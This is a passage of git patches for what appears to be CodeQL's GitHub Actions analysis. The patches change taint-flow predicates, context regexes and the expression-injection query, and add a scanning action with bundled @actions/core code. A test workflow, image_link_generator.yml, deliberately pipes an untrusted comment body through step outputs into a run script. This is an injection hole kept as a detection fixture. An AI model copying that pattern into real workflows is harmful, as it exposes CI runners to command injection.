from OutputExpr to OutputStmt using output var name as the field name. - Create a readStep for CtxAccessExpr to read the referenced fields from the job outputs. --- .../dataflow/internal/DataFlowPrivate.qll | 23 +++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 045910ed6760..12be2d899984 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,9 +133,10 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() } /** @@ -196,9 +197,8 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and - astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -259,9 +259,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { exists(CtxAccessExpr access | - (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + ( + access instanceof NeedsCtxAccessExpr or + access instanceof StepsCtxAccessExpr or + access instanceof JobsCtxAccessExpr + ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and node1.asExpr() = access.getRefExpr() and node2.asExpr() = access @@ -272,12 +279,13 @@ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store an output expression (node1) into its OutputsStm node (node2) - * with a given access path (fieldName) + * Stores an output expression (node1) into its OutputsStm node (node2) + * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(OutputsStmt out, string fieldName | @@ -291,6 +299,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or From 3c12e43d3fa1c5ae4fc878aab68540b15172b69b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 18:09:12 +0100 Subject: [PATCH 034/707] feat(composite-actions): Fix summary and source queries for composite actions analysis --- .../dataflow/internal/DataFlowPrivate.qll | 25 ------------------- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++++++++++++ .../CWE-020/CompositeActionSummaries.ql | 2 -- .../CWE-020/CompositeActionsSources.ql | 8 +++++- 4 files changed, 32 insertions(+), 28 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 12be2d899984..89f31983189a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -139,31 +139,6 @@ newtype TContent = name = any(JobsCtxAccessExpr a).getFieldName() } -/** - * A reference contained in an object. Examples include instance fields, the - * contents of a collection object, the contents of an array or pointer. - */ -class Content extends TContent { - /** Gets the type of the contained data for the purpose of type pruning. */ - DataFlowType getType() { any() } - - /** Gets a textual representation of this element. */ - abstract string toString(); - - /** - * Holds if this element is at the specified location. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `filepath`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 - } -} - predicate forceHighPrecision(Content c) { c instanceof FieldContent } class ContentApprox = ContentSet; diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 52101c7e5a77..8b62cccf30af 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -130,6 +130,31 @@ class ContentSet instanceof Content { } } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ +class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + + /** Gets a textual representation of this element. */ + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} + /** A field of an object, for example an instance variable. */ class FieldContent extends Content, TFieldContent { private string name; diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 00a70eeed2fb..875492644b85 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -17,12 +17,10 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index f67811b3f5fa..19c43ad30661 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -23,9 +23,15 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } } module MyFlow = TaintTracking::Global; From 1cd32195a7f807d4a63d25ca13946b0d4de657d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 11:51:28 +0100 Subject: [PATCH 035/707] feat(bash-step): Improve bash step accuracy Only pass the taint when the env var is directlty set as the step output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +++--------- .../Security/CWE-094/ExpressionInjection.ql | 3 +-- .../workflows/image_link_generator.yml | 26 +++---------------- 3 files changed, 8 insertions(+), 37 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index faa7c4c3ebeb..bc0c782e9ff0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,11 +21,6 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -// private class RunEnvToScriptStep extends AdditionalTaintStep { -// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { -// runEnvToScriptstep(pred, succ) -// } -// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. @@ -34,11 +29,9 @@ class AdditionalTaintStep extends Unit { * env: * BODY: ${{ github.event.comment.body }} * run: | - * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - * echo "Cleaned Initial URL: $INITIAL_URL" - * echo "::set-output name=initial_url::$INITIAL_URL" - * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT - * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | @@ -51,8 +44,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and - // TODO: repalce script with line below - script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r ) diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4b47a154a1d8..99779d6cc907 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -37,5 +37,4 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + - " }}, which may be controlled by an external user." + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 9ebb7bbf2bea..c8a30dad2944 100644 --- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -17,41 +17,21 @@ jobs: env: BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" + echo "::set-output name=initial_url::$BODY" - name: Get Redirected URL with Debugging id: curl env: INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - + echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT - name: Trim URL after PNG id: trim-url env: REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" + echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" From 499c3e7ac3f152b224268752870fa9369b151187 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 12:03:06 +0100 Subject: [PATCH 036/707] Improve regexs --- ql/lib/codeql/actions/Ast.qll | 16 +++++++++++----- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e5f9e35a4a9b..b04694ed5689 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -355,15 +355,21 @@ class CtxAccessExpr extends ExprAccessExpr { abstract Expression getRefExpr(); } -private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string stepsCtxRegex() { + result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string needsCtxRegex() { + result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string jobsCtxRegex() { + result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } +private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } +private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } /** * Holds for an expression accesing the `steps` context. diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2b35b2f332f0..09094f2c580c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -137,7 +137,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { } /** - * Composite action input sources + * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionStmt c; From 0105d63a4423368d25be3249a88432b2fe233a8e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:25:23 +0100 Subject: [PATCH 037/707] Add Action to scan repos --- .github/action/.gitignore | 1 + .github/action/dist/index.js | 30712 +++++++++++++++++++++++++++++ .github/action/dist/licenses.txt | 175 + .github/action/package-lock.json | 639 + .github/action/package.json | 48 + .github/action/src/codeql.ts | 158 + .github/action/src/index.ts | 61 + .github/action/tsconfig.json | 24 + .github/workflows/build.yml | 30 + action.yml | 19 + ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 12 files changed, 31869 insertions(+), 2 deletions(-) create mode 100644 .github/action/.gitignore create mode 100644 .github/action/dist/index.js create mode 100644 .github/action/dist/licenses.txt create mode 100644 .github/action/package-lock.json create mode 100644 .github/action/package.json create mode 100644 .github/action/src/codeql.ts create mode 100644 .github/action/src/index.ts create mode 100644 .github/action/tsconfig.json create mode 100644 .github/workflows/build.yml create mode 100644 action.yml diff --git a/.github/action/.gitignore b/.github/action/.gitignore new file mode 100644 index 000000000000..c2658d7d1b31 --- /dev/null +++ b/.github/action/.gitignore @@ -0,0 +1 @@ +node_modules/ diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js new file mode 100644 index 000000000000..e13da63ecdad --- /dev/null +++ b/.github/action/dist/index.js @@ -0,0 +1,30712 @@ +/******/ (() => { // webpackBootstrap +/******/ var __webpack_modules__ = ({ + +/***/ 7351: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.issue = exports.issueCommand = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const utils_1 = __nccwpck_require__(5278); +/** + * Commands + * + * Command Format: + * ::name key=value,key=value::message + * + * Examples: + * ::warning::This is the message + * ::set-env name=MY_VAR::some value + */ +function issueCommand(command, properties, message) { + const cmd = new Command(command, properties, message); + process.stdout.write(cmd.toString() + os.EOL); +} +exports.issueCommand = issueCommand; +function issue(name, message = '') { + issueCommand(name, {}, message); +} +exports.issue = issue; +const CMD_STRING = '::'; +class Command { + constructor(command, properties, message) { + if (!command) { + command = 'missing.command'; + } + this.command = command; + this.properties = properties; + this.message = message; + } + toString() { + let cmdStr = CMD_STRING + this.command; + if (this.properties && Object.keys(this.properties).length > 0) { + cmdStr += ' '; + let first = true; + for (const key in this.properties) { + if (this.properties.hasOwnProperty(key)) { + const val = this.properties[key]; + if (val) { + if (first) { + first = false; + } + else { + cmdStr += ','; + } + cmdStr += `${key}=${escapeProperty(val)}`; + } + } + } + } + cmdStr += `${CMD_STRING}${escapeData(this.message)}`; + return cmdStr; + } +} +function escapeData(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A'); +} +function escapeProperty(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A') + .replace(/:/g, '%3A') + .replace(/,/g, '%2C'); +} +//# sourceMappingURL=command.js.map + +/***/ }), + +/***/ 2186: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; +const command_1 = __nccwpck_require__(7351); +const file_command_1 = __nccwpck_require__(717); +const utils_1 = __nccwpck_require__(5278); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const oidc_utils_1 = __nccwpck_require__(8041); +/** + * The code to exit an action + */ +var ExitCode; +(function (ExitCode) { + /** + * A code indicating that the action was successful + */ + ExitCode[ExitCode["Success"] = 0] = "Success"; + /** + * A code indicating that the action was a failure + */ + ExitCode[ExitCode["Failure"] = 1] = "Failure"; +})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); +//----------------------------------------------------------------------- +// Variables +//----------------------------------------------------------------------- +/** + * Sets env variable for this action and future actions in the job + * @param name the name of the variable to set + * @param val the value of the variable. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function exportVariable(name, val) { + const convertedVal = utils_1.toCommandValue(val); + process.env[name] = convertedVal; + const filePath = process.env['GITHUB_ENV'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); + } + command_1.issueCommand('set-env', { name }, convertedVal); +} +exports.exportVariable = exportVariable; +/** + * Registers a secret which will get masked from logs + * @param secret value of the secret + */ +function setSecret(secret) { + command_1.issueCommand('add-mask', {}, secret); +} +exports.setSecret = setSecret; +/** + * Prepends inputPath to the PATH (for this action and future actions) + * @param inputPath + */ +function addPath(inputPath) { + const filePath = process.env['GITHUB_PATH'] || ''; + if (filePath) { + file_command_1.issueFileCommand('PATH', inputPath); + } + else { + command_1.issueCommand('add-path', {}, inputPath); + } + process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; +} +exports.addPath = addPath; +/** + * Gets the value of an input. + * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. + * Returns an empty string if the value is not defined. + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string + */ +function getInput(name, options) { + const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; + if (options && options.required && !val) { + throw new Error(`Input required and not supplied: ${name}`); + } + if (options && options.trimWhitespace === false) { + return val; + } + return val.trim(); +} +exports.getInput = getInput; +/** + * Gets the values of an multiline input. Each value is also trimmed. + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string[] + * + */ +function getMultilineInput(name, options) { + const inputs = getInput(name, options) + .split('\n') + .filter(x => x !== ''); + if (options && options.trimWhitespace === false) { + return inputs; + } + return inputs.map(input => input.trim()); +} +exports.getMultilineInput = getMultilineInput; +/** + * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. + * Support boolean input list: `true | True | TRUE | false | False | FALSE` . + * The return value is also in boolean type. + * ref: https://yaml.org/spec/1.2/spec.html#id2804923 + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns boolean + */ +function getBooleanInput(name, options) { + const trueValue = ['true', 'True', 'TRUE']; + const falseValue = ['false', 'False', 'FALSE']; + const val = getInput(name, options); + if (trueValue.includes(val)) + return true; + if (falseValue.includes(val)) + return false; + throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + + `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); +} +exports.getBooleanInput = getBooleanInput; +/** + * Sets the value of an output. + * + * @param name name of the output to set + * @param value value to store. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function setOutput(name, value) { + const filePath = process.env['GITHUB_OUTPUT'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); + } + process.stdout.write(os.EOL); + command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); +} +exports.setOutput = setOutput; +/** + * Enables or disables the echoing of commands into stdout for the rest of the step. + * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. + * + */ +function setCommandEcho(enabled) { + command_1.issue('echo', enabled ? 'on' : 'off'); +} +exports.setCommandEcho = setCommandEcho; +//----------------------------------------------------------------------- +// Results +//----------------------------------------------------------------------- +/** + * Sets the action status to failed. + * When the action exits it will be with an exit code of 1 + * @param message add error issue message + */ +function setFailed(message) { + process.exitCode = ExitCode.Failure; + error(message); +} +exports.setFailed = setFailed; +//----------------------------------------------------------------------- +// Logging Commands +//----------------------------------------------------------------------- +/** + * Gets whether Actions Step Debug is on or not + */ +function isDebug() { + return process.env['RUNNER_DEBUG'] === '1'; +} +exports.isDebug = isDebug; +/** + * Writes debug message to user log + * @param message debug message + */ +function debug(message) { + command_1.issueCommand('debug', {}, message); +} +exports.debug = debug; +/** + * Adds an error issue + * @param message error issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function error(message, properties = {}) { + command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.error = error; +/** + * Adds a warning issue + * @param message warning issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function warning(message, properties = {}) { + command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.warning = warning; +/** + * Adds a notice issue + * @param message notice issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function notice(message, properties = {}) { + command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.notice = notice; +/** + * Writes info to log with console.log. + * @param message info message + */ +function info(message) { + process.stdout.write(message + os.EOL); +} +exports.info = info; +/** + * Begin an output group. + * + * Output until the next `groupEnd` will be foldable in this group + * + * @param name The name of the output group + */ +function startGroup(name) { + command_1.issue('group', name); +} +exports.startGroup = startGroup; +/** + * End an output group. + */ +function endGroup() { + command_1.issue('endgroup'); +} +exports.endGroup = endGroup; +/** + * Wrap an asynchronous function call in a group. + * + * Returns the same type as the function itself. + * + * @param name The name of the group + * @param fn The function to wrap in the group + */ +function group(name, fn) { + return __awaiter(this, void 0, void 0, function* () { + startGroup(name); + let result; + try { + result = yield fn(); + } + finally { + endGroup(); + } + return result; + }); +} +exports.group = group; +//----------------------------------------------------------------------- +// Wrapper action state +//----------------------------------------------------------------------- +/** + * Saves state for current action, the state can only be retrieved by this action's post job execution. + * + * @param name name of the state to store + * @param value value to store. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function saveState(name, value) { + const filePath = process.env['GITHUB_STATE'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); + } + command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); +} +exports.saveState = saveState; +/** + * Gets the value of an state set by this action's main execution. + * + * @param name name of the state to get + * @returns string + */ +function getState(name) { + return process.env[`STATE_${name}`] || ''; +} +exports.getState = getState; +function getIDToken(aud) { + return __awaiter(this, void 0, void 0, function* () { + return yield oidc_utils_1.OidcClient.getIDToken(aud); + }); +} +exports.getIDToken = getIDToken; +/** + * Summary exports + */ +var summary_1 = __nccwpck_require__(1327); +Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); +/** + * @deprecated use core.summary + */ +var summary_2 = __nccwpck_require__(1327); +Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); +/** + * Path exports + */ +var path_utils_1 = __nccwpck_require__(2981); +Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); +Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); +Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); +//# sourceMappingURL=core.js.map + +/***/ }), + +/***/ 717: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +// For internal use, subject to change. +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +const fs = __importStar(__nccwpck_require__(7147)); +const os = 